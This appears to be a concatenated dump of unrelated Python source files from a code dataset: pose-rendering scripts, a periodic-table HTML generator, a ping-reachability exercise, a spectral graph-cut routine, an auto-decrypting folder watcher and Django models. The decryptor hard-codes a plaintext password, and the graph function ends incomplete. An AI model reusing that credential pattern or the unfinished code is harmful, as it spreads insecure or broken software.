    plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
    plt.margins(0,0)
    plt.axis('off')
    plt.savefig("../SPIN_MV/save_h36m/h36m_test_original_%06d.png" % (i), dpi=300)
    # --- save our rendering (drawn over the image) ---
    fig = plt.figure()
    #plt.subplot(1,3,2)
    plt.imshow(rgb_img)
    plt.imshow(im)
    # with dpi=300 the saved image size equals height*width
    fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
    plt.gca().xaxis.set_major_locator(plt.NullLocator())
    plt.gca().yaxis.set_major_locator(plt.NullLocator())
    plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
    plt.margins(0,0)
    plt.axis('off')
    plt.savefig("../SPIN_MV/save_h36m/h36m_test_our_%06d.png" % (i), dpi=300)
    #fig = plt.figure()
    #plt.subplot()
    #plt.imshow(im_1)
    # with dpi=300 the saved image size equals height*width
    # fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
    # plt.gca().xaxis.set_major_locator(plt.NullLocator())
    # plt.gca().yaxis.set_major_locator(plt.NullLocator())
    #plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
    #plt.margins(0,0)
    #plt.axis('off')
    #plt.savefig("../SPIN_MV/save_mpi_smpl/mpi_test_our_view_%04d.png" % (i), dpi=300)
    # --- save the SPIN rendering ---
    fig = plt.figure()
    #plt.subplot(1,3,3)
    plt.imshow(rgb_img)
    plt.imshow(im_spin)
    fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
    plt.gca().xaxis.set_major_locator(plt.NullLocator())
    plt.gca().yaxis.set_major_locator(plt.NullLocator())
    plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
    plt.margins(0,0)
    plt.axis('off')
    plt.savefig("../SPIN_MV/save_h36m/h36m_test_spin_%06d.png" % (i), dpi=300)
    #plt.savefig('../SPIN_MV/save_h36m/h36m_test_%06d.png' % i)
    #plt.pause(1e-3)
"""
iter_num = 25
batch_size = 4
for i in range(24,25): # iteration number
for j in range(2,3): #batch_size
for k in range(1,2):
imgname = mpi_inf_valid['imgname'][i*batch_size+j][k]
#print(join(ROOT,imgname))
rgb_img = cv2.imread(join(ROOT,imgname))[:,:,::-1].copy().astype(np.float32)
center = mpi_inf_valid['center'][i*batch_size+j][k]
scale = mpi_inf_valid['scale'][i*batch_size+j][k]
rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])
pose = mpi_inf_pred['pose'][i*batch_size*4+k*4+j]
betas = mpi_inf_pred['betas'][i*batch_size*4+k*4+j]
camera_t = mpi_inf_pred['camera'][i*batch_size*4+k*4+j]
#gt_keypoints[i*batch_size*4+k*4+j] = mpi_inf_valid['S'][i*batch_size+j][k]
#camera_t = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])
w, h = (IMG_RES, IMG_RES)
rn = ColoredRenderer()
pred_base_smpl = Smpl(model_data)
pred_base_smpl.pose[:] = pose
pred_base_smpl.betas[:] = betas
pred_rot = np.eye(3)
rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
verts = pred_base_smpl.r
im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
pose_spin = mpi_inf_spin['pose'][i*batch_size*4+k*4+j]
betas_spin = mpi_inf_spin['betas'][i*batch_size*4+k*4+j]
camera_t_spin = mpi_inf_spin['camera'][i*batch_size*4+k*4+j]
#camera_t_spin = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])
rn = ColoredRenderer()
pred_base_smpl.pose[:] = pose_spin
pred_base_smpl.betas[:] = betas_spin
rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
verts = pred_base_smpl.r
im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
# orignal image
fig = plt.figure()
#plt.imshow(im+)
#plt.subplot(1,3,1)
plt.imshow(rgb_img)
plt.axis('off')
#plt.subplot(1,3,2)
height, width, channels = rgb_img.shape
# 如果dpi=300,那么图像大小=height*width
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.savefig("../SPIN_MV/save_smpl/S1_%d_view_%d_orig.png" % (i*batch_size+j, k), dpi=300)
# multi
fig = plt.figure()
plt.imshow(rgb_img)
plt.imshow(im)
plt.axis('off')
height, width, channels = rgb_img.shape
# 如果dpi=300,那么图像大小=height*width
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.savefig("../SPIN_MV/save_smpl/S1_%d_view_%d_multi.png" % (i*batch_size+j, k), dpi=300)
#plt.imshow(img[sample_idx].transpose((1,2,0)))
#plt.subplot(1,2,1)
# single
fig = plt.figure()
#plt.subplot(1,3,3)
plt.imshow(rgb_img)
#plt.imshow(img[sample_idx].transpose((1,2,0)))
#plt.subplot(1,2,1)
plt.imshow(im_spin)
plt.axis('off')
#plt.ioff()
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.savefig("../SPIN_MV/save_smpl/S1_%d_view_%d_single.png" % (i*batch_size+j, k), dpi=300)
#plt.pause(1e-3)
#plt.show()
"""
"""
H36M_TO_J17 = [6, 5, 4, 1, 2, 3, 16, 15, 14, 11, 12, 13, 8, 10, 0, 7, 9]
H36M_TO_J14 = H36M_TO_J17[:14]
J24_TO_J17 = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 18, 14, 16, 17]
J24_TO_J14 = J24_TO_J17[:14]
joint_mapper_gt = J24_TO_J14
joint_mapper_h36m = H36M_TO_J14
gt_keypoints = gt_keypoints[:, joint_mapper_gt, :-1]
sio.savemat('../SPIN_MV/evaluation/S1_gt.mat',{'gt_joints17':gt_keypoints})
sio.savemat('../SPIN_MV/evaluation/S1_single_gt.mat',{'pred_joints':mpi_inf_spin['pred_joints']})
sio.savemat('../SPIN_MV/evaluation/S1_multi_gt.mat',{'pred_joints':mpi_inf_pred['pred_joints']})
""" |
7,612 | cb77696a90716acdee83a1cf6162a8f42c524e11 | #!/usr/bin/env python3
import sys
class Parse:
    """Parser for the ad-hoc periodic-table text format.

    Each input line looks like:
        Name = position:P, number:N, small:Sym, molar:M, electron:E1 E2 ...
    and is converted into a dict.
    """

    # Elements produced by the most recent parseFile() call.
    data = []

    def __parseLine(line):
        """Parse the given line into an element dict."""
        import ast  # local import: keeps the module's import surface unchanged
        # extract name (everything before " = ")
        name_len = line.index(" ")
        name = line[:name_len]
        line = line[name_len + 3:]
        # array-ize 'electron' val: wrap the trailing values in [..]
        elec_pos = line.index("electron") + 9
        line = line[:elec_pos] + '[' + line[elec_pos:].replace(' ', ',') + ']'
        # quote 'small' val
        line = line.replace(' ', '')
        line = line.replace('small:', 'small:"').replace(',molar', '",molar')
        # quote all keys
        for key in ["position", "number", "small", "molar", "electron"]:
            line = line.replace(key, '"' + key + '"')
        # Security fix: the constructed string is a pure Python literal, so
        # ast.literal_eval replaces eval -- a crafted input file can no longer
        # execute arbitrary code.
        return ast.literal_eval('{"name":"' + name + '",' + line + '}')

    def parseFile(filename):
        """Parse the given file, storing and returning the element dicts."""
        Parse.data = []
        with open(filename, "r") as f:
            for line in f:
                Parse.data += [Parse.__parseLine(line)]
        return Parse.data
class Write:
    """Render the parsed element list (Parse.data) as an HTML periodic table."""

    def __writeHeader(fd):
        """Write html header"""
        print(
            "<!DOCTYPE html>",
            "<html>",
            " <head>",
            " <title>Super Tableau 3000</title>",
            " <meta charset='utf-8' />",
            " <style>", # ty alex for css!
            " table { border-collapse: collapse; }",
            " td { border: solid; }",
            " h4, li { font-size:10px; }",
            " .empty { border: 0px; }",
            " </style>",
            " </head>",
            " <body>",
            " <table>",
            sep="\n",
            file=fd
        )

    def __writeFooter(fd):
        """Write html footer"""
        print(
            " </table>",
            " </body>",
            "</html>",
            sep="\n",
            file=fd
        )

    def __openRow(fd):
        """Write opening html table row"""
        print(" <tr>", file=fd)

    def __closeRow(fd):
        """Write closing html table row"""
        print(" </tr>", file=fd)

    def __writeElement(fd, elm):
        """Write html table cell"""
        print(
            " <td>",
            " <h4>" + elm["name"] + "</h4>",
            " <ul>",
            " <li>" + str(elm["number"]) + "</li>",
            " <li>" + elm["small"] + "</li>",
            " <li>" + str(elm["molar"]) + "</li>",
            " </ul>",
            " </td>",
            sep="\n",
            file=fd
        )

    def __writeEmptyElement(fd):
        """Write html empty table cell"""
        print(" <td class='empty'></td>", file=fd)

    def writeFile(filename):
        """Write our awesome html file"""
        with open(filename, "w") as f:
            Write.__writeHeader(f)
            Write.__openRow(f)
            i = 0
            for elm in Parse.data:
                # pad with empty cells up to the element's column position
                while i != elm["position"]:
                    Write.__writeEmptyElement(f)
                    i += 1
                Write.__writeElement(f, elm)
                i += 1
                # column 17 is the last: close the row, and open a new one
                # unless this was the final element (number 118)
                if elm["position"] == 17:
                    i = 0
                    Write.__closeRow(f)
                    if elm["number"] != 118:
                        Write.__openRow(f)
            Write.__writeFooter(f)
def doTheJob(input_file):
    """Do all we need: parse *input_file* and emit the matching .html file."""
    Parse.parseFile(input_file)
    output_file = input_file.replace(".txt", ".html")
    Write.writeFile(output_file)
if __name__ == '__main__':
    # Use the path given on the command line, or fall back to the default table.
    target = sys.argv[1] if len(sys.argv) == 2 else "./ex07/periodic_table.txt"
    doTheJob(target)
|
7,613 | dd7e8556405f07172ce2b1e9f486c2cd2f4bad58 | # -*- coding: utf-8 -*-
'''
Задание 12.3
Создать функцию print_ip_table, которая отображает таблицу доступных и недоступных IP-адресов.
Функция ожидает как аргументы два списка:
* список доступных IP-адресов
* список недоступных IP-адресов
Результат работы функции - вывод на стандартный поток вывода таблицы вида:
Reachable Unreachable
----------- -------------
10.1.1.1 10.1.1.7
10.1.1.2 10.1.1.8
10.1.1.9
Функция не должна изменять списки, которые переданы ей как аргументы.
То есть, до выполнения функции и после списки должны выглядеть одинаково.
Для этого задания нет тестов
'''
import subprocess
import ipaddress
from tabulate import tabulate
def ping_ip_addresses(ip_addresses):
    """Ping every address 3 times; return ([reachable], [unreachable])."""
    reachable = []
    unreachable = []
    for ip in ip_addresses:
        proc = subprocess.run(['ping', '-c', '3', '-n', ip],
                              stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE,
                              encoding='utf-8')
        # Exit code 0 means at least one reply came back.
        bucket = reachable if proc.returncode == 0 else unreachable
        bucket.append(ip)
    return (reachable, unreachable)
def convert_ranges_to_ip_list(list_of_ip_addresses):
    """Expand a mixed list of IPs and ranges into a flat list of addresses.

    Two range notations are supported (a range may only span the last octet):
      * full:      '10.1.1.1-10.1.1.3'
      * shorthand: '10.1.1.8-10'  (end is just the final octet)

    FIX: the old code chose between the notations with ``len(end) == 1``,
    so a shorthand range with a multi-digit last octet (e.g. '10.1.1.8-10')
    was parsed as a full address and crashed with IndexError. Decide by the
    presence of '.' in the end part instead.
    """
    result = []
    for item in list_of_ip_addresses:
        parts = item.split('-')
        if len(parts) == 1:
            # Plain address, no range.
            result.append(parts[0])
            continue
        start, end = parts[0], parts[1]
        first_octet = int(start.split('.')[3])
        # Full notation carries dots; shorthand is just the final octet.
        last_octet = int(end.split('.')[3]) if '.' in end else int(end)
        ip = ipaddress.ip_address(start)
        for _ in range(first_octet, last_octet + 1):
            result.append(str(ip))
            ip += 1
    return result
# Expand the ranges, ping everything, and print the resulting table.
columns = ['Reachable', 'Unreachable']
sh_ip = ping_ip_addresses(convert_ranges_to_ip_list(['8.8.4.4', '172.19.30.1-172.19.30.254']))
# NOTE(review): tabulate treats each inner list as a *row*, so the two lists
# print as two rows rather than the two columns shown in the module docstring
# (zip would be needed for column layout) -- verify intended output.
print(tabulate(sh_ip, headers=columns))
|
7,614 | 77d545d1a4fc5f96ae19f654a32ab75707434d46 | # encoding=utf-8
from lib.calculate_time import tic,toc
import scipy as sp
import numpy as np
from lib.make_A import make_A
from lib.make_distance import make_distance
from lib.lambda_sum_smallest import lambda_sum_smallest
from lib.fiedler import fiedler
from lib.make_al import make_al
import math
from lib.newmatrix import newmatrix
from lib.grComp import gr_comp
from lib.Divide2 import Divide2
def mainFunctionD2(Ad, vertex_num, edge_num, nodes_G, iter_times, group):
    """Spectral bisection (ECCEM): repeatedly cut edges of the graph given by
    adjacency matrix Ad using the Fiedler vector, logging lambda2 and timing.

    NOTE(review): Python 2 module (other functions in this file use print
    statements); kept Python-2 compatible -- prints use the single-argument
    paren form, which behaves identically under py2.
    """
    s = []
    s.append(vertex_num)
    # Guard: graph too small, too few edges, or recursion depth exceeded.
    if (vertex_num == 3 or edge_num < 5 or iter_times > 4):
        print("something strange in mainfuntiond2")
        return
    iter_count = 1  # renamed from 'iter' to avoid shadowing the builtin
    tic()
    # Symmetrize the adjacency matrix (fill in the lower triangle from the
    # transpose, element-wise logical OR).
    size_of_Ad = Ad.shape
    transposed_Ad = np.transpose(Ad)
    for i in range(size_of_Ad[0]):
        for j in range(size_of_Ad[1]):
            Ad[i][j] = Ad[i][j] or transposed_Ad[i][j]
    # Incidence matrix A (vertex_num x edge_num, entries +1/-1).
    A = make_A(Ad, vertex_num, edge_num)
    transposed_A = np.transpose(A)
    # Column sums of Ad give the degree vector B.
    B = sum(Ad)
    # Distance matrix (edge_num x 5).
    Distance = make_distance(Ad, A, vertex_num, edge_num, B)
    # Pos is the 1-based row index of the maximum of column 5 of Distance.
    max_list = []
    for each in Distance[:, 4]:
        max_list.append(each)
    Pos = max_list.index(max(max_list)) + 1
    # Degree matrix D, edge Laplacian L = A*A^T, and graph Laplacian L1 = D - W.
    D = np.diag(B)
    L = np.dot(A, transposed_A)
    W = Ad
    L1 = D - W
    cutIndexSign = 0
    # x: eigenvalues of L sorted ascending, stored as a diagonal matrix.
    eig_val, eig_vec = np.linalg.eig(L)
    eig_val_list = []
    for each in eig_val:
        eig_val_list.append(each)
    eig_val_list = sorted(eig_val_list)
    x = np.array(eig_val_list)
    x = np.diag(x)
    # Q: orthonormal basis for the range of L.
    Q = sp.linalg.orth(L)
    # v: Fiedler vector of L (eigenvector of the second-smallest eigenvalue).
    v = fiedler(L)
    lambda2 = lambda_sum_smallest(L, 2)
    print("ECCEM")
    print("切割第" + str(iter_count) + "次")
    # Append the elapsed time to the timing log. (The explicit f.close()
    # calls after the 'with' blocks were no-ops and have been removed --
    # 'with' already closes the file.)
    t = toc()
    with open("/home/a/PycharmProjects/TestZhu/tjufe_1/Social_Network_Graph/output_data/time.txt", "a") as f:
        f.write(str(t) + "\n")
    # Spectral gap between the second and third smallest eigenvalues.
    lambda3 = lambda_sum_smallest(L, 3) - lambda2
    aa = (v[int(Distance[Pos - 1][0]) - 1] - v[int(Distance[Pos - 1][1]) - 1]) ** 2
    b1 = 1 + (2 - aa) / (lambda2 - lambda3)
    low = lambda2 - aa / b1
    # u = Q^T * al.
    al = make_al(vertex_num, Distance[Pos - 1][0], Distance[Pos - 1][1])
    transposed_Q = np.transpose(Q)
    u = np.dot(transposed_Q, al)
    with open("/home/a/PycharmProjects/TestZhu/tjufe_1/Social_Network_Graph/output_data/out.txt", "a") as f:
        f.write(str(lambda2) + "\n")
    while (lambda2 > math.exp(-23)):
        cutIndexSign = 1  # FIX: was 'cutIndexSigen' (typo vs. the init above)
        if (vertex_num == 1 or edge_num < 3):
            break
        # Refresh A, edge_num and B after removing the chosen edge.
        result_list = newmatrix(Distance, A, edge_num, B, Pos)
        A = result_list[0]
        edge_num = result_list[1]
        B = result_list[2]
        Distance = make_distance(Ad, A, vertex_num, edge_num, B)
        max_list = []
        for each in Distance[:, 4]:
            max_list.append(each)
        Pos = max_list.index(max(max_list)) + 1
        iter_count = iter_count + 1
        print("切割第" + str(iter_count) + "次")
        D = np.diag(B)
        transposed_A = np.transpose(A)
        L = np.dot(A, transposed_A)
        v = fiedler(L)
        # Stop as soon as some vertex becomes isolated (degree 0).
        list_B = []
        for each in B:
            list_B.append(each)
        if (0 in list_B):
            print("Distance_size[0]有节点度为0的孤立节点跳出了循环")
            break
        lambda2 = lambda_sum_smallest(L, 2)
        # Log the per-iteration timing.
        t = toc()
        with open("/home/a/PycharmProjects/TestZhu/tjufe_1/Social_Network_Graph/output_data/time.txt", "a") as f:
            f.write(str(t) + "\n")
        lambda3 = lambda_sum_smallest(L, 3) - lambda2
        a1 = (v[int(Distance[Pos - 1][0]) - 1] - v[int(Distance[Pos - 1][1]) - 1]) ** 2
        b1 = 1 + (2 - a1) / (lambda2 - lambda3)
        low = lambda2 - a1 / b1
        with open("/home/a/PycharmProjects/TestZhu/tjufe_1/Social_Network_Graph/output_data/out.txt", "a") as f:
            f.write(str(lambda2) + "\n")
    # compMatrix holds the first two columns of Distance (edge endpoints).
    Distance_size = Distance.shape
    compMatrix = np.arange(Distance_size[0] * 2).reshape(Distance_size[0], 2)
    i = 0
    for each in Distance[:, 0]:
        compMatrix[i][0] = each
        i = i + 1
    j = 0
    for each in Distance[:, 1]:
        compMatrix[j][1] = each
        j = j + 1
    ncV = gr_comp(compMatrix, vertex_num)
    s.append(group)
    s.append(iter_times)
    # FIX: the old code ended this block with 'f.closed' -- a no-op attribute
    # access (and redundant inside 'with' anyway); removed.
    with open("/home/a/PycharmProjects/TestZhu/tjufe_1/Social_Network_Graph/output_group/out.txt", "a") as f:
        f.write(str(s) + "\n")
    nodes_G = np.transpose(nodes_G)
    result_list_of_Divide2 = D
|
7,615 | 6261d06ac7bdcb3ae25cd06338c4c41c3c5f5023 | # import time module, Observer, FileSystemEventHandler
import os
import time
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
import pyAesCrypt
import logging
# Log to a file with timestamp and source location on every line.
logging.basicConfig(filename="Decryptor.log",
                    level=logging.INFO, format="%(asctime)s:%(filename)s:%(lineno)d:%(message)s")
# Watched folder: <Desktop>\aes_decryptor, created on first run.
# Windows-only: relies on the USERPROFILE environment variable.
desktop = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')
decryptor_path = desktop+"\\aes_decryptor"
if not os.path.exists(decryptor_path):
    os.mkdir(decryptor_path)
class OnMyWatch:
    """Observe the decryptor folder and dispatch filesystem events."""

    # Set the directory on watch
    watchDirectory = decryptor_path

    def __init__(self):
        self.observer = Observer()

    def run(self):
        """Start watching; block until interrupted, then shut down cleanly."""
        self.observer.schedule(Handler(), self.watchDirectory, recursive=True)
        self.observer.start()
        try:
            # Idle loop -- the observer does its work on its own thread.
            while True:
                time.sleep(5)
        except:
            self.observer.stop()
            self.observer.join()
class Handler(FileSystemEventHandler):
    """React to file events: decrypt any created/modified '.aes' file."""

    @staticmethod
    def on_any_event(event):
        if event.is_directory:
            return None
        if event.event_type not in ('created', 'modified'):
            return None
        logging.info(f"Watchdog received modified event - {event.src_path}")
        # Only act on AES-Crypt containers.
        if ".aes" in event.src_path:
            decrptor(event.src_path)
        return None
def decrptor(srcPath):
    """Decrypt the AES-Crypt file at *srcPath* in place.

    Writes the plaintext next to the source (same path minus '.aes'),
    removes the encrypted original, and returns True on success.
    Returns False on any failure (the old version returned None), after
    logging the full traceback.
    """
    bufferSize = 64 * 1024
    # SECURITY: hard-coded password -- should come from configuration or an
    # environment variable, not from source code.
    password = "js198989"
    try:
        outfile = srcPath.replace('.aes', '')
        pyAesCrypt.decryptFile(srcPath, outfile, password, bufferSize)
        os.remove(srcPath)
        return True
    except Exception:
        # logging.exception records the active traceback; the message was a
        # pointless f-string with no placeholders.
        logging.exception("ERROR-MESSAGE")
        return False
if __name__ == '__main__':
    logging.info("Decryptor Started Working...")
    OnMyWatch().run()
7,616 | b57b6df1b7e551f64033a0c47e5a22eab9fd5fd4 | import sys
sys.path.append('.')
import torch
from torch.nn import functional as F
import os
import yaml
from src.new_grad_cam import gc
def test(conf):
    """Load the configured model weights and run Grad-CAM over the test set."""
    device = conf['device']
    model = conf['model']
    # Restore the trained weights before evaluation.
    model.load_state_dict(torch.load(conf['weights_path']))
    model = model.to(device)
    model.eval()
    gc(model=model,
       dataset=conf['test_dataset'],
       results_dir=conf['results_dir'],
       classes=conf['data']['classes'],
       device=device)
if __name__ == '__main__':
    from config import get_config
    test(get_config('./conf/testing.yaml'))
7,617 | 9da995184641525cd763ecdb0bca4f28159ae740 | import datetime
import os
import uuid
from abc import ABC, abstractmethod
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.contenttypes.fields import (GenericForeignKey,
GenericRelation)
from django.contrib.contenttypes.models import ContentType
from django.db import models
from bluebird.templatetags.template_extra_filters import (plur_form,
proper_last_name)
from bluebird.tasks import calc_create_gen_async
from django_q.tasks import async_task
from .snippets import str_add_app, KLASS_TYPES, DOC_TYPE
# Units a normative's statistic value is measured in (NormativeCategory.norm_type).
NORM_TYPE = [
    (0, '1 м2 общей площади'),
    (1, '1 место'),
    (2, '1 человек'),
]

# Job titles for signatories (SignUser.position).
POST_TYPE = [
    (0, 'Клиент-менеджер'),
    (1, 'Старший менеджер по работе с ЮЛ'),
    (2, 'Менеджер'),
]
class Adress(models.Model):
    """Postal address: region / city / street / building number.

    NOTE(review): class name keeps the original 'Adress' spelling -- other
    code may reference it, so it must not be renamed here.
    """
    state = models.CharField(verbose_name="Область", max_length=255)
    city = models.CharField(verbose_name="Город", max_length=255)
    street = models.CharField(verbose_name="Улица", max_length=255)
    block = models.CharField(verbose_name="Номер дома", max_length=10)
class ContragentClass(models.Model):
    """Named class/category of contragents (currently unused: Contragent
    stores an integer choice instead -- see the commented-out FK there)."""
    name = models.CharField('Наименование', max_length=255)
class Contragent(models.Model):
    """Counterparty (contragent): identity and banking data, debt figures,
    contract dates, plus helpers for its document packages and media folder.
    """
    # klass = models.ForeignKey(ContragentClass, on_delete=models.CASCADE)
    klass = models.IntegerField(choices=KLASS_TYPES, default=0)
    excell_name = models.CharField('Наименование контрагента (из Excell)',
                                   max_length=255)
    dadata_name = models.CharField('Наименование контрагента (из Dadata)',
                                   max_length=255, blank=True, null=True)
    debt = models.FloatField('Сумма задолжности', default=0.00)
    debt_period = models.IntegerField('Количество неоплаченных периодов, мес.',
                                      blank=True, null=True)
    inn = models.BigIntegerField('ИНН контрагента', blank=True, null=True)
    ogrn = models.BigIntegerField('ОГРН контрагента', blank=True, null=True)
    kpp = models.BigIntegerField('КПП контрагента', blank=True, null=True)
    rs = models.CharField('Р/с', max_length=255, blank=True, null=True)
    ks = models.CharField('К/с', max_length=255, blank=True, null=True)
    bank = models.CharField('Наименование банка', max_length=255, blank=True,
                            null=True)
    bik = models.CharField('БИК', max_length=255, blank=True, null=True)
    opf = models.CharField('ОПФ', max_length=255, blank=True, null=True)
    director_status = models.CharField('Директор (физ. лицо либо юр. лицо)',
                                       max_length=255, blank=True, null=True)
    director_name = models.CharField('Имя либо иное наименование директора',
                                     max_length=255, blank=True, null=True)
    creation_date = models.DateField('Дата создания контрагента (юл)',
                                     blank=True, null=True)
    is_func = models.BooleanField('Признак активности контрагента',
                                  default=True)
    okved = models.CharField('ОКВЭД',
                             max_length=255, blank=True, null=True)
    # TODO REWORK THIS AREA
    physical_address = models.CharField('Физический адресс',
                                        max_length=255)
    legal_address = models.CharField('Юридический адресс',
                                     max_length=255, blank=True, null=True)
    # END OF REWORK
    norm_value = models.ForeignKey('NormativeCategory',
                                   related_name='normatives',
                                   on_delete=models.CASCADE,
                                   blank=True, null=True)
    stat_value = models.FloatField('Показатель', blank=True, null=True)
    contract_accept_date = models.DateField(
        'Дата начала оказания услуг',
        default=datetime.date.fromisoformat('2018-07-01'),
        blank=True, null=True
    )
    current_date = models.DateField('Конечная дата оказания услуг',
                                    default=datetime.date.today, blank=True,
                                    null=True)
    number_contract = models.OneToOneField('ContractNumberClass',
                                           on_delete=models.CASCADE,
                                           max_length=255,
                                           blank=True, null=True)
    current_contract_date = models.DateField('Дата заключения договора',
                                             blank=True, null=True)
    signed_user = models.ForeignKey('SignUser', blank=True, null=True,
                                    on_delete=models.CASCADE,
                                    related_name='signed')
    platform = models.IntegerField('№ площадки',
                                   blank=True, null=True)
    judge_link = models.CharField(verbose_name="", max_length=255,
                                  blank=True, null=True)
    fss_link = models.CharField(verbose_name="", max_length=255,
                                blank=True, null=True)
    personal_number = models.CharField(verbose_name="Лицевой счет",
                                       max_length=255, blank=True, null=True)
    passport_number = models.CharField(verbose_name="Номер паспорта",
                                       max_length=15, blank=True, null=True)
    passport_date = models.DateField(verbose_name="Дата выдачи пасспорта",
                                     blank=True, null=True)
    passport_origin = models.CharField(verbose_name="Кем выдан пасспорт",
                                       max_length=15, blank=True, null=True)
    snils = models.CharField(verbose_name="СНИЛС",
                             max_length=15, blank=True, null=True)

    def create_package_and_folder(self):
        """Ensure this contragent's media folder (and its parent) exists."""
        self.check_and_create_parent_folder()
        if not os.path.isdir(self.get_str_as_path()):
            os.mkdir(self.get_str_as_path(), mode=0o777)

    def check_and_create_parent_folder(self):
        """Ensure the per-class parent folder under MEDIA_ROOT exists."""
        if not os.path.isdir(os.path.join(settings.MEDIA_ROOT,
                                          KLASS_TYPES[self.klass][1])):
            os.mkdir(os.path.join(settings.MEDIA_ROOT,
                                  KLASS_TYPES[self.klass][1]), mode=0o777)

    def get_str_as_path(self):
        """Folder path for this contragent: MEDIA_ROOT/<class>/<pk> <name>."""
        return os.path.join(os.path.join(settings.MEDIA_ROOT,
                                         KLASS_TYPES[self.klass][1]),
                            f'{self.pk} {self.excell_name}')

    @property
    def current_user(self):
        """Users of the active package permitted to act in its current state,
        or None when there is no active package."""
        package = self.get_active_package()
        if package:
            res = [user for user in package.package_users.all(
            ) if package.package_state.is_permitted(user)]
            return res
        return None

    @current_user.setter
    def current_user(self, user):
        # Attach *user* to the active package unless the user (or their
        # department) is already represented in it.
        package = self.get_active_package()
        if package and not package.is_user_in_package(user, True):
            package.package_users.add(user)
            package.save()

    @property
    def active_package(self):
        # Convenience alias for get_active_package().
        return self.get_active_package()

    def get_all_packages(self):
        """All document packages of this contragent, or None if none exist."""
        return DocumentsPackage.objects.filter(contragent=self.pk) or None

    def get_active_package(self):
        """The single active documents package, or None."""
        res = DocumentsPackage.get_active_package(self)
        return res

    def reset_debt(self):
        """Zero out the debt figures and persist immediately."""
        self.debt = 0
        self.debt_period = 0
        self.save()

    def __str__(self):
        return f'{self.excell_name}'

    class Meta:
        verbose_name_plural = "Контрагенты"
class SignUser(models.Model):
    """Signatory: a person authorised to sign documents."""

    name = models.CharField('ФИО отвественного лица', max_length=255)
    document = models.IntegerField('Документ основания', choices=DOC_TYPE,
                                   default=0)
    position = models.IntegerField('Должность', choices=POST_TYPE,
                                   default=0)
    doc_number = models.CharField('Номер документа', max_length=255)
    doc_date = models.DateField('Дата начала действия документа')
    address = models.CharField('Адресс', max_length=255)
    city = models.ForeignKey('CityModel', on_delete=models.CASCADE,
                             blank=True, null=True)
    tel_number = models.CharField('Телефон', max_length=255, default='')
    sign = models.ImageField('Подпись', upload_to='signs/',
                             blank=True, null=True)

    def __str__(self):
        # return self.name
        return f"{proper_last_name(self.name)}, {POST_TYPE[self.position][1]}"

    def save(self, *args, **kwargs):
        """Persist; on update, delete the old signature image if replaced.

        FIX: the previous version unconditionally did
        ``SignUser.objects.get(id=self.id)``, which raised DoesNotExist the
        first time a brand-new instance was saved (its id is still None).
        The lookup now only runs for instances that already have a pk.
        """
        if self.pk is not None:
            try:
                instance = SignUser.objects.get(id=self.id)
            except SignUser.DoesNotExist:
                instance = None
            if instance and instance.sign and self.sign != instance.sign:
                # NOTE(review): uses .url as a filesystem path; this only
                # works when MEDIA_URL maps onto a local path -- probably
                # should be instance.sign.path. Kept as-is to avoid a
                # behavior change; confirm against the deployment.
                if os.path.exists(instance.sign.url):
                    os.remove(instance.sign.url)
        super().save(*args, **kwargs)

    class Meta:
        verbose_name_plural = "Отвественные лица с правом подписи"
class Commentary(models.Model):
    """Free-form comment by a user, attachable to any object (generic FK)."""
    user = models.ForeignKey(settings.AUTH_USER_MODEL,
                             on_delete=models.CASCADE, blank=True, null=True)
    commentary_text = models.TextField('Комментарий', blank=True, null=True)
    creation_date = models.DateTimeField('Дата создания', auto_now_add=True)
    # Generic relation to the commented object.
    content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
    object_id = models.PositiveIntegerField()
    content_object = GenericForeignKey('content_type', 'object_id')
class AbstractFileModel(models.Model):
    """Base model for stored files: name/path metadata plus a generic link
    to the owning object (a documents package)."""
    file_name = models.CharField('Название файла', max_length=255,
                                 null=True, blank=True)
    file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
    creation_date = models.DateField('Дата создания файла',
                                     blank=True, null=True)
    # Generic relation so an arbitrary number of files can be attached.
    content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
